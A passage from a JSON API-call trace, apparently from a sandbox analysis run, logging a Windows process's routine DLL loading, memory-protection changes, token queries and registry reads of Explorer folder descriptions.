10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000264" } ], "repeated": 0, "id": 433 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000260" } ], "repeated": 0, "id": 434 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Temp\\Wldp.dll" } ], "repeated": 0, "id": 435 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" } ], "repeated": 0, "id": 436 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000258" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 437 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000025c" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000258" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" } ], "repeated": 0, "id": 438 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000025c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0500000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0002d000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 439 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0529000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 440 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0519000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 441 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000025c" } ], "repeated": 0, "id": 442 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 443 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf281000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00002000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 444 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 445 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0519000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 446 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\Wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 447 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\windows.storage" }, { "name": "DllBase", "value": "0x7ffedec70000" } ], "repeated": 0, "id": 448 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "api-ms-win-eventing-provider-l1-1-0.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1090000" } ], "repeated": 0, "id": 449 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1090000" }, { "name": "FunctionName", "value": "EventSetInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34b2af0" } ], "repeated": 0, "id": 450 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\wldp" }, { "name": "BaseAddress", "value": "0x7ffee0500000" }, { "name": "InitRoutine", "value": "0x7ffee0503200" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 451 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "api-ms-win-core-synch-l1-2-0.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1090000" } ], "repeated": 0, "id": 452 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1090000" }, { "name": "FunctionName", "value": "InitializeConditionVariable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34d9f40" } ], "repeated": 0, "id": 453 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1090000" }, { "name": "FunctionName", "value": "SleepConditionVariableCS" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee1103890" } ], "repeated": 0, "id": 454 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNELBASE.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1090000" }, { "name": "FunctionName", "value": "WakeAllConditionVariable" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34c5430" } ], "repeated": 0, "id": 455 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 456 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 457 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" } ], "repeated": 0, "id": 458 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34d3410" } ], "repeated": 0, "id": 459 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\windows.storage" }, { "name": "BaseAddress", "value": "0x7ffedec70000" }, { "name": "InitRoutine", "value": "0x7ffedee292f0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 460 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2a57000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 461 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2a57000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 462 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 463 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 464 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x00000006" }, { "name": "ObjectAttributes", "value": "windows_shell_global_counters" } ], "repeated": 0, "id": 465 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000028c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00870000" }, { "name": "SectionOffset", "value": "0x007fe060" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 466 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000290" } ], "repeated": 0, "id": 467 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 468 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 469 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 470 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 471 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "Handle", "value": "0x00000294" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 472 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 473 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 474 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000294" }, { "name": "SubKey", "value": "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}" }, { "name": "Handle", "value": "0x00000298" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}" } ], "repeated": 0, "id": 475 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000294" } ], "repeated": 0, "id": 476 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Category" }, { "name": "Data", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category" } ], "repeated": 0, "id": 477 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "ProgramFilesX86" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name" } ], "repeated": 0, "id": 478 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder" } ], "repeated": 0, "id": 479 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description" } ], "repeated": 0, "id": 480 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath" } ], "repeated": 0, "id": 481 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName" } ], "repeated": 0, "id": 482 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip" } ], "repeated": 0, "id": 483 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\shell32.dll,-21817" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName" } ], "repeated": 0, "id": 484 }, { "timestamp": "2025-11-20 